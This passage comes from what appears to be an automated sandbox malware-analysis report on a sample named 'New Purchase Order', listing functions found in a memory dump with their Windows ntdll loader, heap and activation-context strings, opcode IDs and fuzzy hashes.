                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017622B6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 3faf441b2da528ea7a8612d0bdb6075ae59eab06d2ad022313a5e99709a49c43
                                                          • Instruction ID: e1dbf3815c2e706247c47f787e896f7aa6f2f24070e8f797ff4134e67ce24f10
                                                          • Opcode Fuzzy Hash: 3faf441b2da528ea7a8612d0bdb6075ae59eab06d2ad022313a5e99709a49c43
                                                          • Instruction Fuzzy Hash: E3A19D31A0422ADFDB25CF68C888BA9F7B5BF58314F1541EAD948A7252D730DE81CF90
                                                          Function 01724AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01763437
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0176342A
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01763456
                                                          • RtlDeactivateActivationContext, xrefs: 01763425, 01763432, 01763451
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          • Opcode ID: 94f9fdf8d4ed1fbae2a9ba2bce3abb6033e8cbef5b893c76ac08945e1d12d65f
                                                          • Instruction ID: eeb8ec695e48185be9907377a25ca5513a7b7549f4e067d4c8e5059e56a16522
                                                          • Opcode Fuzzy Hash: 94f9fdf8d4ed1fbae2a9ba2bce3abb6033e8cbef5b893c76ac08945e1d12d65f
                                                          • Instruction Fuzzy Hash: 3C61F4366047229BD722CF1DC845B3AFBE5FF80B50F14856DE95A9B281D730E842CB95
                                                          Function 016F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01751028
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017510AE
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01750FE5
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0175106B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: c220f5ccb4412fb352f2acfd06e03735af186229ff5dae5af349995b08140aa3
                                                          • Instruction ID: 89a0018ce97c3f3b97a768298942fc2dbe926934b12e2136552bbbb8bc6594ce
                                                          • Opcode Fuzzy Hash: c220f5ccb4412fb352f2acfd06e03735af186229ff5dae5af349995b08140aa3
                                                          • Instruction Fuzzy Hash: 8271C1B19043059FCB21DF14CC88B9BBBA8AF94764F400568FA499B28BD774D589CBD2
                                                          Function 0171245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0175A992
                                                          • LdrpDynamicShimModule, xrefs: 0175A998
                                                          • apphelp.dll, xrefs: 01712462
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0175A9A2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: 37d8f46413a660ccf64cca79f58ee8dd9f019f023da27106b5914090d730054f
                                                          • Instruction ID: f7995a08eea564db00069b7578e58a6e26442b6597116ffe89bcca328a1fb8ee
                                                          • Opcode Fuzzy Hash: 37d8f46413a660ccf64cca79f58ee8dd9f019f023da27106b5914090d730054f
                                                          • Instruction Fuzzy Hash: 0B316875A40202ABDB319F5DD885EAAFBF4FB98720F22416DFD006B249C7B05D41CB80
                                                          Function 017029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0170327D
                                                          • HEAP[%wZ]: , xrefs: 01703255
                                                          • HEAP: , xrefs: 01703264
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: b6b3fbe06e82a4459ec5a189f9c5a83239819e9b8e9e59da0f2c3f6e6746a9d8
                                                          • Instruction ID: 12ca003cbda81e678c1a1de1590c96062ba9f54c50488bc1c3bf1c37b35125cb
                                                          • Opcode Fuzzy Hash: b6b3fbe06e82a4459ec5a189f9c5a83239819e9b8e9e59da0f2c3f6e6746a9d8
                                                          • Instruction Fuzzy Hash: 1E92AA71A04749DFDB26CF68C448BAEFBF1BF48304F188099E859AB392D735A945CB50
                                                          Function 01700770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 11d43794914a87d8e8bc09fad3bb390471a76dc77ec0f133dfe1437755158e8e
                                                          • Instruction ID: 9fa14ae25803b46017ddaf1e94f63f67b5df074b2bbf2f1e616f524c79630d11
                                                          • Opcode Fuzzy Hash: 11d43794914a87d8e8bc09fad3bb390471a76dc77ec0f133dfe1437755158e8e
                                                          • Instruction Fuzzy Hash: 0FF1AD70600606DFEB16CF68C894B6AFBF5FF44354F1482A8E9169B381D774EA81CB90
                                                          Function 01716962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          • Opcode ID: d578307096cbe1220539206ea693f216973e7aa1de77a0f4f5ad9ac11ef9377c
                                                          • Instruction ID: c0844be77de560d60c7cc2302aa9cca3fc9fbb3ee6afc16118af30b50eecdd7d
                                                          • Opcode Fuzzy Hash: d578307096cbe1220539206ea693f216973e7aa1de77a0f4f5ad9ac11ef9377c
                                                          • Instruction Fuzzy Hash: 7DC28E716083419FEB2ACF28C881BABFBE5AF88714F04896DF989C7245D774D845CB52
                                                          Function 016EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: 24b6dafd8a03b7c936054080f309af568a0f9e1e04772517f98aa7cd9ee47f95
                                                          • Instruction ID: 9e6f947b9176763927cf37f5eda9dbc53de95a089c3135b535b61b7d0062bbd7
                                                          • Opcode Fuzzy Hash: 24b6dafd8a03b7c936054080f309af568a0f9e1e04772517f98aa7cd9ee47f95
                                                          • Instruction Fuzzy Hash: 0DA17F719122299BDB32DF68CC88BEAFBB8EF44710F1041E9E909A7251D7359E85CF50
                                                          Function 01710BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0175A10F
                                                          • LdrpCheckModule, xrefs: 0175A117
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0175A121
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: f729551c6e4ac93f73f76f94a35447230ef04186a3b32e02759c144eef24153c
                                                          • Instruction ID: 2c71bbd06cbea9c552512345f07043aa48fde6f6c38212958cb00a619926e23e
                                                          • Opcode Fuzzy Hash: f729551c6e4ac93f73f76f94a35447230ef04186a3b32e02759c144eef24153c
                                                          • Instruction Fuzzy Hash: 2271DD70A0020ADFDB25DF6CC984AAEF7F5FB48214F14806DE906AB249E774A981CB50
                                                          Function 01700A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: 5bb3d6d5f4a2d4247e1cdd0e81e1f33aee25dac2685a0a332f516389318828fa
                                                          • Instruction ID: ef357c4090040067ac1e99b6872bee9152a5aa3fa4a0d636254f88bf355334c4
                                                          • Opcode Fuzzy Hash: 5bb3d6d5f4a2d4247e1cdd0e81e1f33aee25dac2685a0a332f516389318828fa
                                                          • Instruction Fuzzy Hash: 09619E70600701DFDB2ACF28C884B6AFBE1FF45758F14859DE8598B296D7B0E981CB91
                                                          Function 0172C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 017682DE
                                                          • Failed to reallocate the system dirs string !, xrefs: 017682D7
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017682E8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 4f6cef3d675683111c7661e9d007d49e6b3b4fc1bdb0ada7ca7d9609474393d5
                                                          • Instruction ID: 61f2617e5c4337485e20d3161b8e08ade818086c8b0a3b39af35d9e733047f62
                                                          • Opcode Fuzzy Hash: 4f6cef3d675683111c7661e9d007d49e6b3b4fc1bdb0ada7ca7d9609474393d5
                                                          • Instruction Fuzzy Hash: 3E41E272554311ABC732EB68DC48B5BB7E8AF68764F00892AFA45DB294E770D8008B91
                                                          Function 017AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017AC1C5
                                                          • @, xrefs: 017AC1F1
                                                          • PreferredUILanguages, xrefs: 017AC212
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: a5c1570edd541a2067965e6b8662bf32a235c8d21a31fe9c5d90ef9e0f3874d5
                                                          • Instruction ID: a54ba06e91a7e7c62485b537673fad0e72d2a1d4e05e85e0dbfcb196b2698ccb
                                                          • Opcode Fuzzy Hash: a5c1570edd541a2067965e6b8662bf32a235c8d21a31fe9c5d90ef9e0f3874d5
                                                          • Instruction Fuzzy Hash: 7D416371E04219FBDF12DAD8C855FEEFBB8AB58700F54416AE609F7280D7749A44CB50
                                                          Function 01784144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: 998cad52a9d161d5bce7f969924e075d2bb5ae4d87a132c14ce30e20ca747363
                                                          • Instruction ID: 69799fbca2f2f602f38d5832eaff9460cf8ff2ce007c3cd326ff412da08794ca
                                                          • Opcode Fuzzy Hash: 998cad52a9d161d5bce7f969924e075d2bb5ae4d87a132c14ce30e20ca747363
                                                          • Instruction Fuzzy Hash: 3D410531A4875ACFEB26EB98C848BADFBB4FF55340F14045AD902EB781D7B48901CB10
                                                          Function 01774755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpCheckRedirection, xrefs: 0177488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01774899
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01774888
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: 9470af99fca6f66f0d57c923bab9c3c974aae833e9c14ca2313d5d45adfa32f4
                                                          • Instruction ID: 459ed8c0128753fa9aafbf38ca3ab944b1536fd046792de4f6290c37c12f7630
                                                          • Opcode Fuzzy Hash: 9470af99fca6f66f0d57c923bab9c3c974aae833e9c14ca2313d5d45adfa32f4
                                                          • Instruction Fuzzy Hash: 2041CE32A442559FCF21CE6CD840A26FBE5EF89A60F0506ADED5ADB211D730E810CBD1
                                                          Function 01700BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: 1fcfacbaa970782ef27e139e35e1c46b5de190ce186f6f87b21b4b86bc6929ef
                                                          • Instruction ID: f6c90bed7fccee6254be019cc234a85908db118c34c6144bd0ad5e66d1fc70f0
                                                          • Opcode Fuzzy Hash: 1fcfacbaa970782ef27e139e35e1c46b5de190ce186f6f87b21b4b86bc6929ef
                                                          • Instruction Fuzzy Hash: 49110331315642DFDB6ADA18CC84B7AFBE5EF40A66F18815EF806CB292DB70E841C754
                                                          Function 017720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializationFailure, xrefs: 017720FA
                                                          • Process initialization failed with status 0x%08lx, xrefs: 017720F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01772104
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: 89f27f21429add73feb3d943cf98e455e830478db9de2e26824cab1ac468eeb0
                                                          • Instruction ID: aa1608dd6d47a304b7415b70e0e1ff0f1fa072be2c129c3d32b8a26f6ea4a685
                                                          • Opcode Fuzzy Hash: 89f27f21429add73feb3d943cf98e455e830478db9de2e26824cab1ac468eeb0
                                                          • Instruction Fuzzy Hash: E4F0C875B403086BEB24DA4DDC57FA9B7A8FB45B64F10005DF6056B286D5B0A500C651
                                                          Function 017003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 64aea745e2a8a5eb6b4821fc2d5d449823a37d0ec5c9eb8f190e6378828b7a86
                                                          • Instruction ID: 5e9501ce6676be9d2a114b18125a9a4dc2a3cad7f1922546b5deed076d7abc3e
                                                          • Opcode Fuzzy Hash: 64aea745e2a8a5eb6b4821fc2d5d449823a37d0ec5c9eb8f190e6378828b7a86
                                                          • Instruction Fuzzy Hash: EF716871A0024ADFDB02DFA8C994FAEB7F8BF58344F154065E901E7295EA74ED41CBA0
                                                          Function 016FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 016FAA13
                                                          • LdrResSearchResource Exit, xrefs: 016FAA25
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: fb530cf985c0285159b13e8e4a9841dbe60a6841f0fcd37b3e4adc6f992a0d18
                                                          • Instruction ID: 2349e44e2714d881ad03eed3c40121b960d5bbff979179e013ad3ae10a790a71
                                                          • Opcode Fuzzy Hash: fb530cf985c0285159b13e8e4a9841dbe60a6841f0fcd37b3e4adc6f992a0d18
                                                          • Instruction Fuzzy Hash: 63E17F71A042099BEB228ED9CD84BAEBBBABF04350F10452AEE05E7291D7B49945CB50
                                                          Function 017BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: f767879e0b331427abe845db305730bcb688f09c8e81fbb9c656463c94ea9071
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: CFC1E1712043429BEB25DF28C885BABFBE5AFC4318F184A2DF696CB291D774D505CB81
                                                          Function 0176E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 81b9b21df27a920a5a981d3291bc08c1d96b25f3fbbe8206f4cc42d4d8b39417
                                                          • Instruction ID: ff1dcd1b10ddd5e69600a8ffcc976fdf3ad7bb9ee2864859f487f463e1a3d7b4
                                                          • Opcode Fuzzy Hash: 81b9b21df27a920a5a981d3291bc08c1d96b25f3fbbe8206f4cc42d4d8b39417
                                                          • Instruction Fuzzy Hash: 79615E75E4031A9FDB15DFA8C844BAEFBB9FB44700F14406DEA49EB291DB35A940CB60
                                                          Function 017943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: 87d9d9244e95565f54e26663c1fb2ddc172fee2555366159ab6e056bd7ec5af7
                                                          • Instruction ID: 2512a050f8ed9b505bda20e0d678d2d6e947a85d74cf8ff3fbc7031849cf757c
                                                          • Opcode Fuzzy Hash: 87d9d9244e95565f54e26663c1fb2ddc172fee2555366159ab6e056bd7ec5af7
                                                          • Instruction Fuzzy Hash: 8C513771E0061EAFDF11DFE9DD84AEEFBB8EB44754F100529E611A7291D7309A0ACB60
                                                          Function 016F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • kLsE, xrefs: 016F0540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016F063D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 7431ed669560507b7a31dfacd6951339cfc91590676b267191ae3c39218f9626
                                                          • Instruction ID: f57b619ea4aaeb4cc27af8a9ef70e31b5dbfceee2bf63fc1f511f6306f25f1bb
                                                          • Opcode Fuzzy Hash: 7431ed669560507b7a31dfacd6951339cfc91590676b267191ae3c39218f9626
                                                          • Instruction Fuzzy Hash: 23519F71504742CBD724DF68C9446A7BBE6AF89304F10883EF6DA87342E770E545CB91
                                                          Function 016FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 016FA2FB
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 016FA309
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: 797046da6b4a51e8fb679b4209c2f2a14222f5adaa7ddbc5a19e82738eed0bbd
                                                          • Instruction ID: 0906a037618ddb7e78615b386e874ff13b87418f1346276505a8faad7f717b0b
                                                          • Opcode Fuzzy Hash: 797046da6b4a51e8fb679b4209c2f2a14222f5adaa7ddbc5a19e82738eed0bbd
                                                          • Instruction Fuzzy Hash: 4341DE36A00645DBDB26DF99C840B6ABBB5FF85700F2440A9EE08DB392E7B5D941CB40
                                                          Function 0172A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: 610b196566b8e6b11dd7e310a47330cb7c2ea019b4830b69d2134257af93a43c
                                                          • Instruction ID: 2be5c128e0ab24700015459291de3bafe8510c1f6e0c9bdfba0f652960e408fc
                                                          • Opcode Fuzzy Hash: 610b196566b8e6b11dd7e310a47330cb7c2ea019b4830b69d2134257af93a43c
                                                          • Instruction Fuzzy Hash: 4001DCB2250740AFD321DF24CD49B26B7E8E798B25F00897DF649CB590E734E805CB46
                                                          Function 016FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 4fb44ab361a2884aa9026136ad487917518460cca0346a84cca054cf4ed7956b
                                                          • Instruction ID: 272429c7e9a10484cf0140002a9e769cfaf48ec11fb9a22e5ae4be00618ac62a
                                                          • Opcode Fuzzy Hash: 4fb44ab361a2884aa9026136ad487917518460cca0346a84cca054cf4ed7956b
                                                          • Instruction Fuzzy Hash: A3824A75E002198BEB25CFA9CC80BEDBBB5FF49310F14816DDA59AB391D730A946CB50
                                                          Function 01776420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: cb12134824265f92552d0c69b60aea3e9489af865d2a80d054a165c48ec32d61
                                                          • Instruction ID: 58a7d9a52070b7a5f3646c2554b38f0f8de119ce807f739decca2ced8cc604e7
